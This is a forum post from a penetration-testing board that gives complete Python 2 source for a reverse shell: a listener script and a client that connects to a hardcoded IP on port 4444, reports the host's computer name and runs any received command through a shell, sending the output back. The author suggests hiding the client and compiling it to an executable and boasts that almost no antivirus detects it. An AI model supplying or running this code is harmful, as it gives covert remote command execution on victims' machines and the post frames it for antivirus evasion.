How to make Python Reverse Shell

Penetration testing
Post Reply
User avatar
emocion
Posts: 11
Joined: Fri Nov 03, 2017 9:39 pm

How to make Python Reverse Shell

Postby emocion » Tue Aug 21, 2018 3:58 pm

First, we create the server, create a server.py python script and enter this code in it (make any changes you want):

Code: Select all

import socket, os, sys
def socketCreate():
    try:
        global host
        global port
        global s
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        host = ''
        port = raw_input('Type the port for listening: ')
        if port == '':
            socketCreate()
        port = int(port)
    except socket.error as msg:
        print 'Socket creation error: ' + str(msg[0])
def socketBind():
    try:
        print 'Binding socket at port %s'%(port)
        s.bind((host,port))
        s.listen(1)
    except socket.error as msg:
        print 'Socket binding error: ' + str(msg[0])
        print 'Retrying...'
        socketBind()
def socketAccept():
    global conn
    global addr
    global hostname
    try:
        conn, addr = s.accept()
        print '[!] Session opened at %s:%s'%(addr[0],addr[1])
        print '\n'
        hostname = conn.recv(1024)
        menu()
    except socket.error as msg:
        print 'Socket binding error: ' + str(msg[0])
def menu():
    while 1:
        cmd = raw_input(str(addr[0])+'@' + str(hostname) + '> ')
        if cmd == quit:
            conn.close()
            s.close()
            sys.exit()
        command = conn.send(cmd)
        result = conn.recv(16834)
        if result <> hostname:
            print result
def main():
    socketCreate()
    socketBind()
    socketAccept()
main()


Then we create the client.py with the code:

Code: Select all

import socket, os, subprocess
def connect():
    os.system('cls')
    global host
    global port
    global s
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    port = 4444 #porta kum koito shte se svurje
    host = '192.168.0.100' #ip-to kum koeto shte se svurje
    try:
        print '[!] Trying to connect to %s:%s'%(host,port)
        s.connect((host,port))
        print '[!] Connection established'
        s.send(os.environ['COMPUTERNAME'])
    except:
        print 'Could not connect'
def recieve():
    recieve = s.recv(1024)
    if recieve == "quit":
        s.close
    else:
        proc2 = subprocess.Popen(recieve[0:], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        stdout_value = proc2.stdout.read() + proc2.stderr.read()
        args = 'otp: ' + stdout_value
    send(args)
def send(args):
    send = s.send(args)
    recieve()
connect()
recieve()
s.close()


You need to set the port and the IP of the listening port. You can also add the client to hide and compile it on Executable, but I do not need it. The most interesting thing is that as it is now almost no antivirus detects it :)

All you have to do is run the server to write a port to listen to to run your client on one of your devices and test it.
Top
Post Reply

Return to “Penetration Tests”